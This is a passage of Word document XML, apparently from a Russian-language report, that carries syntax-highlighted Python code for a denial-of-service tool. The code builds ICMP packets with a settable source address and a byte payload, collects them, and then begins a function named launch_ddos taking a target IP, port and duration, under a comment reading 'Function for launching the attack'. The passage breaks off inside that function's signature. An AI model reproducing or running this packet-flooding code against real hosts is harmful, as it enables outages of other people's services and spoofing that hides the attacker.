          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"X"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>payload_size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76207F" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> == ICMP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C98F17" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)/ICMP()/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"X"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>payload_size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F832EDC" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A98F08" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0E8F7" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C563B60" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53309E14" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2D34B1" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Функция</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>запуска</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>атаки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B3275" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>launch_ddos</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
